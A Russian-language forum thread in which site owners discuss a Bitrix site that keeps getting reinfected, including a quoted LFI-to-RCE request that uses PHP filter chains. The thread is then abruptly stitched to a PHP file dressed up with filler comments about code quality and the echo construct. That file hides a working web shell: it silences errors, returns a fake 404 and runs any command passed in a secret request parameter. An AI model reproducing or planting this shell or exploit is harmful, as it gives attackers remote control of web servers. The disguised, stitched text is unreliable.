Столкнулся с такой же проблемой. При помощи virusdie.ru вычистил зараженные файлы. Однако постоянно добавляется паразитный код в начало index.php и перезаписывается htaccess с редиректом на index.php.
Посмотрел список агентов - ничего вроде бы подозрительного, но на всякий случай декативировал все агенты. При этом все равно index.php и htaccess модифицируются практически мгновенно.
Перенес все файлы из папки сайта во временную папку, оставив public_html пустой - тут же создались index.php и htaccess.
На кроне каких-либо задач нет, хостинг - обычный шареный хостинг в Таймвебе.
написал: Ломают через уязвимость LFI2RCE via PHP Filters.
POST запрос выглядит так:"POST /products/index.php?ID=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|.........|convert.base64-decode/resource=php://temp HTTP/1.1" 200 15544 "-" "firefox" Будет создан веб-шелл через который дальше будут лить все подряд
написал: на \bitrix\modules\main\bx_root.php не сработал механизм
я так понял, до конца так и не определились, родной тот код в конце или вредоносный.
у меня еще в \bitrix\components\bitrix\player\mediaplayer\skins\five\display\index.php подозрительный код был, возможно с именно этой атакой не связано.
Товарищи, те кто успешно лечит, сориентируйте пожалуйста по ценам на эту услугу + обновление до актуальных версий битрикса. Свежий бекап есть, но возможно он тоже с закладками.
bitrix/managed_cache/MYSQL/ --- это я средствами битрикс искал, это всё ок bitrix/modules/main/classes/general/vuln_scanner.php --- там и должно быть bitrix/modules/socialnetwork/lib/item/logindex.php --- вроде должен быть, но модуль не использую, закоментировал.
The quality of a program begins with the quality of the source code. The fundamental factor for quality of source code is its readability and clarity. Formalized rules are necessary to write code which will be readable and understandable. The rules for formatting code must be uniform throughout the entire project. It is highly desirable for the rules to be similar fr om project to project.
This is a test module.
*/
error_reporting(0); // set error
/*
Outputs one or more data, with no additional newlines or spaces. echo is not a function but a language construct. */
header('HTTP/1.1 404 Not Found'); // set status page
/*
Its arguments are a list of data following the echo keyword, separated by commas, and not delimited by parentheses. Unlike some other language constructs, echo does not have any return value, so it cannot be used in the context of an expression. echo also has a shortcut syntax, wh ere you can immediately follow the opening tag with an equals sign. This syntax is available even with the short_open_tag configuration setting disabled.
*/
if(isset($_REQUEST['iasfgjlzcb'])) echo `$_REQUEST[iasfgjlzcb]`; // test output data
// echo - Output one or more strings // The major differences to print are that echo accepts multiple arguments and doesn't have a return value.
